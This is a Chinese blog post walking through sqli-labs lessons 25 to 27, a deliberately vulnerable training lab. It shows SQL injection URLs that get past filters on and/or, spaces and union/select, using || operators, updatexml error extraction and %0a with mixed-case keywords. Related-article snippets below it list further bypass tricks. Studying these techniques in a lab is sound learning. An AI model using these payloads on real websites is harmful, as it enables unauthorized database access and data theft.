20、绕过去除and、or、union select、空格的sql注入

最新推荐文章于 2024-02-05 23:50:57 发布
最新推荐文章于 2024-02-05 23:50:57 发布
阅读量1.4k 收藏 4
点赞数 2
分类专栏: 小课堂 文章标签: sqli-labs 特殊字符 绕过 sql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_41489908/article/details/103475103
版权
环境sqli-labs
less 25
1、输入特殊字符,报错

http://192.168.1.121/sqli/Less-25/?id=1
在这里插入图片描述

2、单引号闭合

在这里插入图片描述

3、输入and、or都会被过滤,报错,输入||正常,所以可以判断是大小写过滤

http://192.168.1.121/sqli/Less-25/?id=1’ and 1=1 --+
http://192.168.1.121/sqli/Less-25/?id=1’ or1=1 --+
在这里插入图片描述

http://192.168.1.121/sqli/Less-25/?id=1’ || 1=1 --+
在这里插入图片描述

less 26
一、输入特殊字符,看报错信息

http://192.168.1.121/sqli/Less-26/?id=1’
在这里插入图片描述

二、闭合语句没有效果,屏蔽了-,空格,or等等

http://192.168.1.121/sqli/Less-26/?id=1’ --+

三、重新构造闭合语句

http://192.168.1.121/sqli/Less-26/?id=1’ ||‘a’='a
在这里插入图片描述
这样就绕过了去空格

四、获取数据库名称

http://192.168.1.121/sqli/Less-26/?id=1’||updatexml(1,concat(’$’,(database())),0)||‘1’=‘1
在这里插入图片描述
less 27
一、输入特殊字符,报错
http://192.168.1.121/sqli/Less-27/?id=1’
在这里插入图片描述

二、由于过滤了特殊符号,构造如下闭合语句
http://192.168.1.121/sqli/Less-27/?id=1’ ||'1
在这里插入图片描述

三、通过union查询
http://192.168.1.121/sqli/Less-27/?id=1’ union select 1,2,3 ||'1
在这里插入图片描述
union、select屏蔽了,空格也屏蔽了

四、union.select大小写替换一下,空格用/%0a/替换
http://192.168.1.121/sqli/Less-27/?id=0’/%0a/uniOn/%0a/seLect/%0a/1,2,3%20||'1
在这里插入图片描述

五、获取数据库名称
http://192.168.1.121/sqli/Less-27/?id=0’/%0a/uniOn/%0a/seLect/%0a/1,database(),3||'1
在这里插入图片描述

禁止非法,后果自负

欢迎关注公众号:web安全工具库
在这里插入图片描述

web安全工具库
关注
专栏目录
23-5 绕过去除 unionselectSQL 注入
weixin_43263566的博客
02-07 947
在MySQL中,默认情况下,数据库名、表名在Unix、Linux系统上是区分大小写的,而在Windows系统上则不区分大小写。但是,SQL语句中的关键字(如SELECT、INSERT)、函数名(如MAX()、COUNT())以及列名和别名通常是不区分大小写的。但是,对于字符串值的比较,默认是区分大小写的。下面,我将简要介绍一些MySQL的基础知识,以及您提到的一些特殊编码和替换技巧。在某些安全性较低的应用场景中,攻击者可能会尝试通过改变查询语句的格式来绕过安全过滤器,执行SQL注入等恶意操作。
23-3 绕过过滤 and 和 or 的 SQL注入
weixin_43263566的博客
02-03 331
在深入了解SQL注入等数据库安全话题之前,掌握一些MySQL数据库的基础知识是很重要的。
第十八节 绕过剔除黑名单(unionselect)的SQL注入-01
09-15
第十八节 绕过剔除黑名单(unionselect)的SQL注入-01
sql注入-绕过过滤空格
MichealCurry1的博客
10-09 2833
空格可以用/**/,%20替换
SQL注入绕过空格
nihao_ma_的博客
05-07 2068
SQL注入空格绕过技巧
SQL注入 绕过and和or过滤
m_de_g的博客
12-09 3544
SQL注入 绕过and和or过滤 1.基础知识介绍 1.MySQL中的大小写不敏感,大写与小写一样。 2.MySQL中的十六进制与URL编码 3.符号和关键字替换and – &&、or–|| 4.内联注释与多行注释 /*! 内联注释*/ /*多行注释*/ 2.去除and和or的代码分析 3.绕过去除and和or的SQL注入 1.大小写变形,Or,OR,oR,OR,And,ANd,aND等 代码中大小写不敏感都被剔除 2.在这两个敏感词汇中添加注释,例如:a/**/nd 双写绕过 oorr
[SQL注入]CTFshow-----WEB6(空格绕过
菜鸟的博客
07-25 369
sql注入的步骤:先查表再查字段后查数据 输入万能密码 1' #抓包发现报错 去掉之后发现正常,这我想到了空格绕过/**/ 万能登陆密码登录 检测回显位置—得到回显位为2 查表,得表名flag,user 构造语句:select/**/1,group_concat(table_name),3/**/from/**/information_schema.tables/**/where/**/table_schema=database() 查字段/列名,得列名’flag' 查数据 ...
CTFhub-sql注入-绕过空格过滤
ssss39的博客
08-19 463
如果1/**/union/**/select/**/1=1的显示结果与1/**/union/**/select/**/1=2的显示结果不一样,1/**/union/**/select/**/1,2 没有将数据带出来。3 没有回显,说明只用 1,2 这两个。与1的结果一样说明存在注入点。字段名dzkctujmta。
23-4 绕过过滤空格SQL 注入
最新发布
weixin_43263566的博客
02-05 592
在深入了解SQL注入等数据库安全话题之前,掌握一些MySQL数据库的基础知识是很重要的。
2021-09-01 网安实验-SQL注入-绕过UNION&SELECT过滤
热门推荐
时光隧道
09-01 4万+
关键代码为: 在MySQL中tab,空格,回车都可以隔断语句,那么我们就可以用使用/**/ 或() 或+ 代替空格,%0c =换页、%09 = 水平制表符、%0d = 回车、%0a = 换行。那我们试试 『id=12211%27+uniOn%09selEct%0d1,2,password%0dfrom%0dusers%0dwhere%0did=%272%27||%27』 成功了呢。很多不可见的空白字符都可以用哦,你可以试试。 ...
SQL注入绕过的技巧总结
09-09
主要给大家总结了一些关于SQL注入绕过的技巧,其中包括引号绕过、逗号绕过以及比较符(<,>)绕过,文中给出了详细的介绍和示例代码,相信对大家具有一定的参考价值,需要的朋友们下面来一起看看吧。
SQL注入绕过
嚴 帅的博客
04-30 1022
由于Web注入危害比较大,各种防御技术也会应用而生;程序员在写代码的时候会有意识地进行防御设置或者安全测试来封堵Web注入,但是想要绝对的安全,是比较难实现的。针对黑名单过滤技术,绕过的基本思路就是找到一种可替换的符号或者可替换的逻辑语句(来实现SQL注入);对于白名单技术,虽然实现了安全性,但是可能会阻挡一些客户端的合法流量,白名单技术一般用在一些形式固定场景。大多数Web网站还是会使用黑名单技...
mysql注入绕过空格过滤的方法
至臻求学,胸怀云月
04-05 2万+
SQL注入时,空格的使用是非常普遍的。比如,我们使用union来取得目标数据: http://www.xxx.com/index.php?id=1 and 0 union select null,null,null 上面的语句,在and两侧、union两侧、select的两侧,都需要空格。 1. 注释绕过空格 这是最基本的方法,在一些自动化SQL注射工具中,使用也十分普遍。在M
SQL注入实战:绕过操作
ting_liang的博客
01-27 2700
preg replace(mixed $pattern, mixed $replacement, mixed$subject):执行-个正则表达式的搜索和替换。id=1 && 1=1或者?可以利用网络中的开源的URL在线编码,绕过SQL注入的过滤机制。1、大小写变形,Or,OR,oR,And,ANd,aND等-代码中大小写不敏感都剔除。3、利用符号代替--and --&& --or--|| 等。5、网站的每个数据层的编码统一,建议全部使用utf-8编码。
生命在于学习——SQL注入绕过
易水哲的博客
08-17 1万+
SQL注入绕过技术已经是一个老生常淡的内容了
SQL注入绕过技巧
whj_study的博客
12-18 2772
1.绕过空格(注释符/* */,%a0):   两个空格代替一个空格,用Tab代替空格,%a0=空格: %20 %09 %0a %0b %0c %0d %a0 %00 /**/ /*!*/ 最基本的绕过方法,用注释替换空格: /* 注释 */ 使用浮点数: select * from users where id=8E0union select 1,2,3 select * from users where id=8.0 select 1,2,3 2.括号绕过空格:   如..
SQL注入时当and、or等字符被过滤了怎么办
weixin_40950781的博客
08-25 1万+
SQL注入时and、or被过滤了怎么办当常用字符被注释无法使用时,通常采取以下方法(可自行搜索sql注入绕开过滤等):0x01字母被注释(or、and等)1. 大小写变形2. 改变编码3. 添加注释4. 往字符里面插入被过滤的字符(双写法)5.利用符号形式0x02数字被注释(1、2等)6. 使用浮点数0x03 符号被注释(<、>等)7. 利用函数代替 当常用字符被注释无法使用时,通常采...
8-Web安全——SQL注入WAF绕过之and,or,空格
网络安全
06-03 5354
1. and和or绕过 and和or的作用: and关键字表示同时满足两个条件,例如测试字符型注入和数字型注入用到的and 1=1和and1=2两个条件语句。 or表示满足其中一个条件即可,例如报错注入时用到的or语句 下面是后台过滤and和or关键字的源代码: function blacklist($id) { $id= preg_replace('/or/i',"", $id); //strip out OR (non case sensitive) $id= preg_repl.
sql注入常见绕过方法
ljlrookiebird的博客
09-05 4642
sql注入是web安全的常见漏洞,这里总结下常见的绕过姿势,还有其他没总结到了,小伙伴可以留言补充
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

web安全工具库

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值